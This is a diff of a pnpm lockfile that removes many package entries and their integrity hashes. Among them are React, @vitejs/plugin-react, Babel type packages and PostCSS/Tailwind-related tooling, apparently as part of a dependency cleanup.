-        integrity: sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ==,
-      }
 
   "@jridgewell/resolve-uri@3.1.2":
     resolution:
@@ -1087,12 +669,6 @@ packages:
         integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==,
       }
     engines: { node: ">=14" }
-
-  "@rolldown/pluginutils@1.0.0-beta.27":
-    resolution:
-      {
-        integrity: sha512-+d0F4MKMCbeVUJwG96uQ4SgAznZNSq93I3V+9NHA4OpvqG8mRCpGdKmK8l/dl02h2CCDHwW2FqilnTyDcAnqjA==,
-      }
 
   "@rollup/rollup-android-arm-eabi@4.55.1":
     resolution:
@@ -1300,36 +876,6 @@ packages:
         integrity: sha512-l2aFy5jALhniG5HgqrD6jXLi/rUWrKvqN/qJx6yoJsgKhblVd+iqqU4RCXavm/jPityDo5TCvKMnpjKnOriy0w==,
       }
 
-  "@types/babel__core@7.20.5":
-    resolution:
-      {
-        integrity: sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==,
-      }
-
-  "@types/babel__generator@7.27.0":
-    resolution:
-      {
-        integrity: sha512-ufFd2Xi92OAVPYsy+P4n7/U7e68fex0+Ee8gSG9KX7eo084CWiQ4sdxktvdl0bOPupXtVJPY19zk6EwWqUQ8lg==,
-      }
-
-  "@types/babel__template@7.4.4":
-    resolution:
-      {
-        integrity: sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==,
-      }
-
-  "@types/babel__traverse@7.28.0":
-    resolution:
-      {
-        integrity: sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q==,
-      }
-
-  "@types/braces@3.0.5":
-    resolution:
-      {
-        integrity: sha512-SQFof9H+LXeWNz8wDe7oN5zu7ket0qwMu5vZubW4GCJ8Kkeh6nBWUz87+KTz/G3Kqsrp0j/W253XJb3KMEeg3w==,
-      }
-
   "@types/chai@5.2.3":
     resolution:
       {
@@ -1352,12 +898,6 @@ packages:
     resolution:
       {
         integrity: sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==,
-      }
-
-  "@types/micromatch@4.0.10":
-    resolution:
-      {
-        integrity: sha512-5jOhFDElqr4DKTrTEbnW8DZ4Hz5LRUEmyrGpCMrD/NphYv3nUnaF08xmSLx1rGGnyEs/kFnhiw6dCgcDqMr5PQ==,
       }
 
   "@types/node-fetch@2.6.13":
@@ -1388,32 +928,6 @@ packages:
     resolution:
       {
         integrity: sha512-1N9SBnWYOJTrNZCdh/yJE+t910Y128BoyY+zBLWhL3r0TYzlTmFdXrPwHL9DyFZmlEXNQQolTZh3KHV31QDhyA==,
-      }
-
-  "@types/prompts@2.4.9":
-    resolution:
-      {
-        integrity: sha512-qTxFi6Buiu8+50/+3DGIWLHM6QuWsEKugJnnP6iv2Mc4ncxE4A/OJkjuVOA+5X0X1S/nq5VJRa8Lu+nwcvbrKA==,
-      }
-
-  "@types/prop-types@15.7.15":
-    resolution:
-      {
-        integrity: sha512-F6bEyamV9jKGAFBEmlQnesRPGOQqS2+Uwi0Em15xenOxHaf2hv6L8YCVn3rPdPJOiJfPiCnLIRyvwVaqMY3MIw==,
-      }
-
-  "@types/react-dom@18.3.7":
-    resolution:
-      {
-        integrity: sha512-MEe3UeoENYVFXzoXEWsvcpg6ZvlrFNlOQ7EOsvhI3CfAXwzPfO8Qwuxd40nepsYKqyyVQnTdEfv68q91yLcKrQ==,
-      }
-    peerDependencies:
-      "@types/react": ^18.0.0
-
-  "@types/react@18.3.27":
-    resolution:
-      {
-        integrity: sha512-cisd7gxkzjBKU2GgdYrTdtQx1SORymWyaAFhaxQPK9bYO9ot3Y5OikQRvY0VYQtvwjeQnizCINJAenh/V7MK2w==,
       }
 
   "@typescript-eslint/eslint-plugin@8.52.0":
@@ -1504,15 +1018,6 @@ packages:
         integrity: sha512-ink3/Zofus34nmBsPjow63FP5M7IGff0RKAgqR6+CFpdk22M7aLwC9gOcLGYqr7MczLPzZVERW9hRog3O4n1sQ==,
       }
     engines: { node: ^18.18.0 || ^20.9.0 || >=21.1.0 }
-
-  "@vitejs/plugin-react@4.7.0":
-    resolution:
-      {
-        integrity: sha512-gUu9hwfWvvEDBBmgtAowQCojwZmJ5mcLn3aufeCsitijs3+f2NsrPtlAWIR6OPiqljl96GVCUbLe0HyqIpVaoA==,
-      }
-    engines: { node: ^14.18.0 || >=16.0.0 }
-    peerDependencies:
-      vite: ^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0
 
   "@vitest/coverage-v8@4.0.16":
     resolution:
@@ -1661,25 +1166,6 @@ packages:
       }
     engines: { node: ">=12" }
 
-  any-promise@1.3.0:
-    resolution:
-      {
-        integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==,
-      }
-
-  anymatch@3.1.3:
-    resolution:
-      {
-        integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==,
-      }
-    engines: { node: ">= 8" }
-
-  arg@5.0.2:
-    resolution:
-      {
-        integrity: sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==,
-      }
-
   argparse@1.0.10:
     resolution:
       {
@@ -1718,16 +1204,6 @@ packages:
         integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==,
       }
 
-  autoprefixer@10.4.23:
-    resolution:
-      {
-        integrity: sha512-YYTXSFulfwytnjAPlw8QHncHJmlvFKtczb8InXaAx9Q0LbfDnfEYDE55omerIJKihhmU61Ft+cAOSzQVaBUmeA==,
-      }
-    engines: { node: ^10 || ^12 || >=14 }
-    hasBin: true
-    peerDependencies:
-      postcss: ^8.1.0
-
   balanced-match@1.0.2:
     resolution:
       {
@@ -1739,13 +1215,6 @@ packages:
       {
         integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==,
       }
-
-  baseline-browser-mapping@2.9.11:
-    resolution:
-      {
-        integrity: sha512-Sg0xJUNDU1sJNGdfGWhVHX0kkZ+HWcvmVymJbj6NSgZZmW/8S9Y2HQ5euytnIgakgxN6papOAWiwDo1ctFDcoQ==,
-      }
-    hasBin: true
 
   better-path-resolve@1.0.0:
     resolution:
@@ -1759,13 +1228,6 @@ packages:
       {
         integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==,
       }
-
-  binary-extensions@2.3.0:
-    resolution:
-      {
-        integrity: sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==,
-      }
-    engines: { node: ">=8" }
 
   brace-expansion@1.1.12:
     resolution:
@@ -1785,14 +1247,6 @@ packages:
         integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==,
       }
     engines: { node: ">=8" }
-
-  browserslist@4.28.1:
-    resolution:
-      {
-        integrity: sha512-ZC5Bd0LgJXgwGqUknZY/vkUQ04r8NXnJZ3yYi4vDmSiZmC/pdSN0NbNRPxZpbtO4uAfDUAFffO8IZoM3Gj8IkA==,
-      }
-    engines: { node: ^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7 }
-    hasBin: true
 
   buffer-equal-constant-time@1.0.1:
     resolution:
@@ -1814,19 +1268,6 @@ packages:
       }
     engines: { node: ">=6" }
 
-  camelcase-css@2.0.1:
-    resolution:
-      {
-        integrity: sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==,
-      }
-    engines: { node: ">= 6" }
-
-  caniuse-lite@1.0.30001762:
-    resolution:
-      {
-        integrity: sha512-PxZwGNvH7Ak8WX5iXzoK1KPZttBXNPuaOvI2ZYU7NrlM+d9Ov+TUvlLOBNGzVXAntMSMMlJPd+jY6ovrVjSmUw==,
-      }
-
   chai@6.2.2:
     resolution:
       {
@@ -1846,20 +1287,6 @@ packages:
       {
         integrity: sha512-PsezH1rqdV9VvyNhxxOW32/d75r01NY7TQCmOqomRo15ZSOKbpTFVsfjghxo6JloQUCGnH4k1LGu0R4yCLlWQQ==,
       }
-
-  chokidar@3.6.0:
-    resolution:
-      {
-        integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==,
-      }
-    engines: { node: ">= 8.10.0" }
-
-  chokidar@4.0.3:
-    resolution:
-      {
-        integrity: sha512-Qgzu8kfBvo+cA4962jnP1KkS6Dop5NS6g7R5LFYJr4b8Ub94PPQXUksCw9PvXoeXPRRddRNC5C1JQUR2SMGtnA==,
-      }
-    engines: { node: ">= 14.16.0" }
 
   ci-info@3.9.0:
     resolution:
@@ -1915,23 +1342,10 @@ packages:
       }
     engines: { node: ">=20" }
 
-  commander@4.1.1:
-    resolution:
-      {
-        integrity: sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==,
-      }
-    engines: { node: ">= 6" }
-
   concat-map@0.0.1:
     resolution:
       {
         integrity: sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==,
-      }
-
-  convert-source-map@2.0.0:
-    resolution:
-      {
-        integrity: sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==,
       }
 
   cross-spawn@7.0.6:
@@ -1940,20 +1354,6 @@ packages:
         integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==,
       }
     engines: { node: ">= 8" }
-
-  cssesc@3.0.0:
-    resolution:
-      {
-        integrity: sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==,
-      }
-    engines: { node: ">=4" }
-    hasBin: true
-
-  csstype@3.2.3:
-    resolution:
-      {
-        integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==,
-      }
 
   data-uri-to-buffer@4.0.1:
     resolution:
@@ -2000,24 +1400,12 @@ packages:
       }
     engines: { node: ">=8" }
 
-  didyoumean@1.2.2:
-    resolution:
-      {
-        integrity: sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==,
-      }
-
   dir-glob@3.0.1:
     resolution:
       {
         integrity: sha512-WkrWp9GR4KXfKGYzOLmTuGVi1UWFfws377n9cc55/tb6DuqyF6pcQ5AbiHEshaDpY9v6oaSr2XCDidGmMwdzIA==,
       }
     engines: { node: ">=8" }
-
-  dlv@1.1.3:
-    resolution:
-      {
-        integrity: sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==,
-      }
 
   dotenv@8.6.0:
     resolution:
@@ -2043,12 +1431,6 @@ packages:
     resolution:
       {
         integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==,
-      }
-
-  electron-to-chromium@1.5.267:
-    resolution:
-      {
-        integrity: sha512-0Drusm6MVRXSOJpGbaSVgcQsuB4hEkMpHXaVstcPmhu5LIedxs1xNK/nIxmQIU/RPC0+1/o0AVZfBTkTNJOdUw==,
       }
 
   emoji-regex@10.6.0:
@@ -2117,14 +1499,6 @@ packages:
       }
     engines: { node: ">= 0.4" }
 
-  esbuild@0.21.5:
-    resolution:
-      {
-        integrity: sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==,
-      }
-    engines: { node: ">=12" }
-    hasBin: true
-
   esbuild@0.27.2:
     resolution:
       {
@@ -2132,13 +1506,6 @@ packages:
       }
     engines: { node: ">=18" }
     hasBin: true
-
-  escalade@3.2.0:
-    resolution:
-      {
-        integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==,
-      }
-    engines: { node: ">=6" }
 
   escape-string-regexp@4.0.0:
     resolution:
@@ -2387,12 +1754,6 @@ packages:
       }
     engines: { node: ">=12.20.0" }
 
-  fraction.js@5.3.4:
-    resolution:
-      {
-        integrity: sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==,
-      }
-
   fs-extra@7.0.1:
     resolution:
       {
@@ -2434,13 +1795,6 @@ packages:
         integrity: sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==,
       }
     engines: { node: ">=18" }
-
-  gensync@1.0.0-beta.2:
-    resolution:
-      {
-        integrity: sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==,
-      }
-    engines: { node: ">=6.9.0" }
 
   get-east-asian-width@1.4.0:
     resolution:
@@ -2488,14 +1842,6 @@ packages:
       {
         integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==,
       }
-    hasBin: true
-
-  glob@11.1.0:
-    resolution:
-      {
-        integrity: sha512-vuNwKSaKiqm7g0THUBu2x7ckSs3XJLXE+2ssL7/MfTGPLLcrJQ/4Uq1CjPTtO5cCIiRxqvN6Twy1qOwhL0Xjcw==,
-      }
-    engines: { node: 20 || >=22 }
     hasBin: true
 
   globals@14.0.0:
@@ -2643,20 +1989,6 @@ packages:
       }
     engines: { node: ">=0.8.19" }
 
-  is-binary-path@2.1.0:
-    resolution:
-      {
-        integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==,
-      }
-    engines: { node: ">=8" }
-
-  is-core-module@2.16.1:
-    resolution:
-      {
-        integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==,
-      }
-    engines: { node: ">= 0.4" }
-
   is-extglob@2.1.1:
     resolution:
       {
@@ -2746,25 +2078,12 @@ packages:
         integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==,
       }
 
-  jackspeak@4.1.1:
-    resolution:
-      {
-        integrity: sha512-zptv57P3GpL+O0I7VdMJNBZCu+BPHVQUk55Ft8/QCJjTVxrnJHuVuX/0Bl2A6/+2oyR/ZMEuFKwmzqqZ/U5nPQ==,
-      }
-    engines: { node: 20 || >=22 }
-
   jiti@1.21.7:
     resolution:
       {
         integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==,
       }
     hasBin: true
-
-  js-tokens@4.0.0:
-    resolution:
-      {
-        integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==,
-      }
 
   js-tokens@9.0.1:
     resolution:
@@ -2784,14 +2103,6 @@ packages:
       {
         integrity: sha512-qQKT4zQxXl8lLwBtHMWwaTcGfFOZviOJet3Oy/xmGk2gZH677CJM9EvtfdSkgWcATZhj/55JZ0rmy3myCT5lsA==,
       }
-    hasBin: true
-
-  jsesc@3.1.0:
-    resolution:
-      {
-        integrity: sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==,
-      }
-    engines: { node: ">=6" }
     hasBin: true
 
   json-bigint@1.0.0:
@@ -2818,14 +2129,6 @@ packages:
         integrity: sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==,
       }
 
-  json5@2.2.3:
-    resolution:
-      {
-        integrity: sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==,
-      }
-    engines: { node: ">=6" }
-    hasBin: true
-
   jsonfile@4.0.0:
     resolution:
       {
@@ -2850,32 +2153,12 @@ packages:
         integrity: sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==,
       }
 
-  kleur@3.0.3:
-    resolution:
-      {
-        integrity: sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==,
-      }
-    engines: { node: ">=6" }
-
   levn@0.4.1:
     resolution:
       {
         integrity: sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==,
       }
     engines: { node: ">= 0.8.0" }
-
-  lilconfig@3.1.3:
-    resolution:
-      {
-        integrity: sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==,
-      }
-    engines: { node: ">=14" }
-
-  lines-and-columns@1.2.4:
-    resolution:
-      {
-        integrity: sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==,
-      }
 
   lint-staged@16.2.7:
     resolution:
@@ -2925,30 +2208,10 @@ packages:
       }
     engines: { node: ">=18" }
 
-  loose-envify@1.4.0:
-    resolution:
-      {
-        integrity: sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==,
-      }
-    hasBin: true
-
   lru-cache@10.4.3:
     resolution:
       {
         integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==,
-      }
-
-  lru-cache@11.2.4:
-    resolution:
-      {
-        integrity: sha512-B5Y16Jr9LB9dHVkh6ZevG+vAbOsNOYCX+sXvFWFu7B3Iz5mijW3zdbMyhsh8ANd2mSWBYdJgnqi+mL7/LrOPYg==,
-      }
-    engines: { node: 20 || >=22 }
-
-  lru-cache@5.1.1:
-    resolution:
-      {
-        integrity: sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==,
       }
 
   magic-string@0.30.21:
@@ -3012,13 +2275,6 @@ packages:
       }
     engines: { node: ">=18" }
 
-  minimatch@10.1.1:
-    resolution:
-      {
-        integrity: sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==,
-      }
-    engines: { node: 20 || >=22 }
-
   minimatch@3.1.2:
     resolution:
       {
@@ -3050,12 +2306,6 @@ packages:
     resolution:
       {
         integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==,
-      }
-
-  mz@2.7.0:
-    resolution:
-      {
-        integrity: sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==,
       }
 
   nano-spawn@2.0.0:
@@ -3105,33 +2355,6 @@ packages:
         integrity: sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==,
       }
     engines: { node: ^12.20.0 || ^14.13.1 || >=16.0.0 }
-
-  node-releases@2.0.27:
-    resolution:
-      {
-        integrity: sha512-nmh3lCkYZ3grZvqcCH+fjmQ7X+H0OeZgP40OierEaAptX4XofMh5kwNbWh7lBduUzCcV/8kZ+NDLCwm2iorIlA==,
-      }
-
-  normalize-path@3.0.0:
-    resolution:
-      {
-        integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==,
-      }
-    engines: { node: ">=0.10.0" }
-
-  object-assign@4.1.1:
-    resolution:
-      {
-        integrity: sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==,
-      }
-    engines: { node: ">=0.10.0" }
-
-  object-hash@3.0.0:
-    resolution:
-      {
-        integrity: sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==,
-      }
-    engines: { node: ">= 6" }
 
   obug@2.1.1:
     resolution:
@@ -3256,25 +2479,12 @@ packages:
       }
     engines: { node: ">=8" }
 
-  path-parse@1.0.7:
-    resolution:
-      {
-        integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==,
-      }
-
   path-scurry@1.11.1:
     resolution:
       {
         integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==,
       }
     engines: { node: ">=16 || 14 >=14.18" }
-
-  path-scurry@2.0.1:
-    resolution:
-      {
-        integrity: sha512-oWyT4gICAu+kaA7QWk/jvCHWarMKNs6pXOGWKDTr7cw4IGcUbW+PeTfbaQiLGheFRpjo6O9J0PmyMfQPjH71oA==,
-      }
-    engines: { node: 20 || >=22 }
 
   path-type@4.0.0:
     resolution:
@@ -3317,87 +2527,12 @@ packages:
     engines: { node: ">=0.10" }
     hasBin: true
 
-  pify@2.3.0:
-    resolution:
-      {
-        integrity: sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==,
-      }
-    engines: { node: ">=0.10.0" }
-
   pify@4.0.1:
     resolution:
       {
         integrity: sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==,
       }
     engines: { node: ">=6" }
-
-  pirates@4.0.7:
-    resolution:
-      {
-        integrity: sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==,
-      }
-    engines: { node: ">= 6" }
-
-  postcss-import@15.1.0:
-    resolution:
-      {
-        integrity: sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==,
-      }
-    engines: { node: ">=14.0.0" }
-    peerDependencies:
-      postcss: ^8.0.0
-
-  postcss-js@4.1.0:
-    resolution:
-      {
-        integrity: sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==,
-      }
-    engines: { node: ^12 || ^14 || >= 16 }
-    peerDependencies:
-      postcss: ^8.4.21
-
-  postcss-load-config@6.0.1:
-    resolution:
-      {
-        integrity: sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==,
-      }
-    engines: { node: ">= 18" }
-    peerDependencies:
-      jiti: ">=1.21.0"
-      postcss: ">=8.0.9"
-      tsx: ^4.8.1
-      yaml: ^2.4.2
-    peerDependenciesMeta:
-      jiti:
-        optional: true
-      postcss:
-        optional: true
-      tsx:
-        optional: true
-      yaml:
-        optional: true
-
-  postcss-nested@6.2.0:
-    resolution:
-      {
-        integrity: sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==,
-      }
-    engines: { node: ">=12.0" }
-    peerDependencies:
-      postcss: ^8.2.14
-
-  postcss-selector-parser@6.1.2:
-    resolution:
-      {
-        integrity: sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==,
-      }
-    engines: { node: ">=4" }
-
-  postcss-value-parser@4.2.0:
-    resolution:
-      {
-        integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==,
-      }
 
   postcss@8.5.6:
     resolution:
@@ -3421,13 +2556,6 @@ packages:
     engines: { node: ">=10.13.0" }
     hasBin: true
 
-  prompts@2.4.2:
-    resolution:
-      {
-        integrity: sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==,
-      }
-    engines: { node: ">= 6" }
-
   punycode@2.3.1:
     resolution:
       {
@@ -3447,54 +2575,12 @@ packages:
         integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==,
       }
 
-  react-dom@18.3.1:
-    resolution:
-      {
-        integrity: sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==,
-      }
-    peerDependencies:
-      react: ^18.3.1
-
-  react-refresh@0.17.0:
-    resolution:
-      {
-        integrity: sha512-z6F7K9bV85EfseRCp2bzrpyQ0Gkw1uLoCel9XBVWPg/TjRj94SkJzUTGfOa4bs7iJvBWtQG0Wq7wnI0syw3EBQ==,
-      }
-    engines: { node: ">=0.10.0" }
-
-  react@18.3.1:
-    resolution:
-      {
-        integrity: sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==,
-      }
-    engines: { node: ">=0.10.0" }
-
-  read-cache@1.0.0:
-    resolution:
-      {
-        integrity: sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==,
-      }
-
   read-yaml-file@1.1.0:
     resolution:
       {
         integrity: sha512-VIMnQi/Z4HT2Fxuwg5KrY174U1VdUIASQVWXXyqtNRtxSr9IYkn1rsI6Tb6HsrHCmB7gVpNwX6JxPTHcH6IoTA==,
       }
     engines: { node: ">=6" }
-
